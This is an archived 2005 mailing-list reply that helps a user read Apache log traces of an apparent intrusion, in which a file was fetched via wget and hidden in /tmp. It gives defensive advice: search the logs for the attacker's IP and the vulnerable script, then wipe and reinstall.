Re: Am I Compromised -- Some interesting findings
On Fri, Nov 25, 2005 at 10:12:25PM +0530, Ritesh Raj Sarraf wrote:
> Now let's look a little of /var/log/apache2/error.log:
>
> Resolving maple.phpwebhosting.com... 70.86.76.34
> Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 18,698 [text/plain]
>
> 0K .......... ........ 100% 210.37
> KB/s
Looks like it was downloaded via wget.
Run "grep wget /var/log/apache/access.log" - that should give you the
IP address of the attackign host.
It might be worth posting any matching lines; that way somebody might
be able to tell you which script (cgi/php/etc) was used as the attack
vector.
Definitely a time to wipe, reinstall and import your backups though.
> The logs show that the guy uploaded the files to /tmp and hid them.
Indeed, but we need to find out what allowed them to do so -
presumably something insecure running upon your host. Untill you know
what it was reinstalling will not prevent it from happening again.
Steve
--
Reply to: